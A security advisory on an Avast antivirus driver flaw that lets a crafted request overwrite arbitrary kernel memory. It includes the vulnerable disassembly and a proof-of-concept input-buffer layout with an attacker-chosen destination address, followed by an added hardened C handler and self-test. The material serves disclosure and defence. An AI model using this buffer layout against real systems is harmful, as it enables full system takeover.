‘Avast Antivirus Device Driver Memory Overwriting Vulnerability’

Summary

Avast Antivirus is ‘very common antivirus software package with a big worldwide userbase’.

A device driver memory overwriting vulnerability has been discovered in Avast Antivirus. Successful exploitation allows an attacker to obtain full system control (ring0 privileges).

Credit:

‘The information has been provided by Piotr Bania.
The original article can be found at: http://pb.specialised.info/all/adv/avast-adv.txt’


Details

‘The vulnerability is caused by the lack of a bounds-checking procedure in the device driver. By sending special signal(s) together with a specially crafted input buffer, attackers can force the Avast Asynchronous Virus Monitor to overwrite specified memory with data provided by the attacker.

Here is one of the vulnerable code segments:
(DISASSEMBLY OF Aavmker4 DEVICE DRIVER)
.text:00010901 loc_10901: ; CODE XREF:
; sub_10604+2A8j
.text:00010901 mov eax, [ebx+0Ch] ; eax=input buffer
.text:00010904 xor edx, edx ; edx=0
.text:00010906 mov [ebp+var_8], eax ; store
.text:00010909 cmp [eax], edx ; input buffer == 0?
.text:0001090B jz short loc_10966 ; if so -> exit
.text:0001090D mov edi, [eax+870h] ; edi=address from
; input buffer+870h
.text:00010913 lea esi, [eax+4] ; esi=ptr to input
; buffer+4
.text:00010916 mov ecx, 21Ah ; ecx=21Ah size to
; copy (const)
.text:0001091B rep movsd ; copy

Sending the input buffer shown below:
input_buff:
db ‘YOU!’
db 86Ch dup (90h) ; source memory (ESI)
dd 1234567h ; destination address
db ‘GONDIE’

forces the Avast device driver to write data from ‘source memory’ to the destination address (here 1234567h).’
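The root cause in the disassembly is that the handler takes its copy destination (edi) from the request itself and its copy length from a constant, without checking either against the sizes the I/O manager reported for the request. The example below is an added, hypothetical hardened handler written here for illustration; it is not code from Bania's advisory or from Avast. It is portable user-mode C that stands in for a kernel IOCTL handler: the `in_len`/`out_len` parameters play the role of the InputBufferLength/OutputBufferLength a Windows driver reads from its IRP stack location, and `out` plays the role of the METHOD_BUFFERED SystemBuffer. The offsets and the copy size (0x21A dwords from buf+4, destination dword at buf+0x870) are taken from the disassembly on this page; all function and constant names, and the request bytes built by `aavm_build_request`, are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Request layout as read from the Aavmker4 disassembly above. */
#define AAVM_COPY_DWORDS 0x21Au                    /* mov ecx, 21Ah: dwords moved by rep movsd */
#define AAVM_PAYLOAD_OFF 4u                        /* lea esi, [eax+4]: copy source is buf+4 */
#define AAVM_PAYLOAD_LEN (AAVM_COPY_DWORDS * 4u)   /* 0x868 bytes */
#define AAVM_DEST_OFF    0x870u                    /* mov edi, [eax+870h]: caller-chosen target */

enum aavm_status {
    AAVM_OK = 0,
    AAVM_ERR_BAD_ARGS,
    AAVM_ERR_SHORT_INPUT,
    AAVM_ERR_SHORT_OUTPUT,
    AAVM_NOOP_EMPTY
};

/* Hypothetical hardened handler. The address embedded at offset 0x870 is
 * deliberately never read: the only memory written is the buffer the caller
 * (in a real driver, the I/O manager) supplied, and only as many bytes as
 * that buffer was declared to hold. Every read is bounded by in_len. */
enum aavm_status aavm_handle_request(const uint8_t *in, size_t in_len,
                                     uint8_t *out, size_t out_len,
                                     size_t *bytes_written)
{
    uint32_t first_dword;

    if (bytes_written != NULL) *bytes_written = 0;
    if (in == NULL || out == NULL || bytes_written == NULL)
        return AAVM_ERR_BAD_ARGS;

    /* The copy reads in[4 .. 4+0x868); refuse anything shorter. */
    if (in_len < AAVM_PAYLOAD_OFF + AAVM_PAYLOAD_LEN)
        return AAVM_ERR_SHORT_INPUT;

    /* Mirrors the "cmp [eax], edx / jz" early exit: zero first dword = nothing to do. */
    memcpy(&first_dword, in, sizeof first_dword);
    if (first_dword == 0)
        return AAVM_NOOP_EMPTY;

    /* The write must fit the declared output size before a single byte moves. */
    if (out_len < AAVM_PAYLOAD_LEN)
        return AAVM_ERR_SHORT_OUTPUT;

    memcpy(out, in + AAVM_PAYLOAD_OFF, AAVM_PAYLOAD_LEN);
    *bytes_written = AAVM_PAYLOAD_LEN;
    return AAVM_OK;
}

/* Constructed request in the shape shown on the page: a marker dword, a
 * filler region, and a bogus destination dword at 0x870 that a correct
 * handler must ignore. Returns the number of bytes placed in req, 0 if
 * the caller's buffer is too small. */
size_t aavm_build_request(uint8_t *req, size_t cap, uint32_t marker, uint32_t bogus_dest)
{
    const size_t need = AAVM_DEST_OFF + 4u;
    if (req == NULL || cap < need) return 0;
    memset(req, 0x41, need);                 /* constructed filler byte */
    memcpy(req, &marker, sizeof marker);
    memcpy(req + AAVM_DEST_OFF, &bogus_dest, sizeof bogus_dest);
    return need;
}

/* Exercises the cases a reviewer of this handler would want covered.
 * Returns 1 if every case behaved as the comments say, 0 otherwise. */
int aavm_selftest(void)
{
    uint8_t req[AAVM_DEST_OFF + 4u];
    uint8_t out[AAVM_PAYLOAD_LEN];
    size_t len, written = 0;

    len = aavm_build_request(req, sizeof req, 0x21554F59u /* 'YOU!' little-endian */, 0x01234567u);
    if (len != sizeof req) return 0;

    /* 1. Truncated input: the 0x868-byte read is refused, nothing written. */
    if (aavm_handle_request(req, 0x100, out, sizeof out, &written) != AAVM_ERR_SHORT_INPUT) return 0;
    if (written != 0) return 0;

    /* 2. Output buffer smaller than the copy: refused before any write. */
    if (aavm_handle_request(req, len, out, 16, &written) != AAVM_ERR_SHORT_OUTPUT) return 0;

    /* 3. Well-formed request: exactly AAVM_PAYLOAD_LEN filler bytes land in out,
     *    and the 0x01234567 "destination" had no effect on where they went. */
    if (aavm_handle_request(req, len, out, sizeof out, &written) != AAVM_OK) return 0;
    if (written != AAVM_PAYLOAD_LEN || out[0] != 0x41 || out[AAVM_PAYLOAD_LEN - 1] != 0x41) return 0;

    return 1;
}

int main(void)
{
    printf("hardened handler self-test: %s\n", aavm_selftest() ? "ok" : "FAILED");
    return aavm_selftest() ? 0 : 1;
}
```

The two checks that matter are the ones the original code lacks: the input length is compared against the highest offset the handler reads, and the output length against the number of bytes it writes, both before any `memcpy`. Treating a pointer found inside the request as a write target is never safe in a kernel handler, so the hardened version simply does not have that code path; when a driver must accept a user pointer for a METHOD_NEITHER request, it additionally needs ProbeForWrite under a try/except, which this portable example cannot show.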

Categories: Windows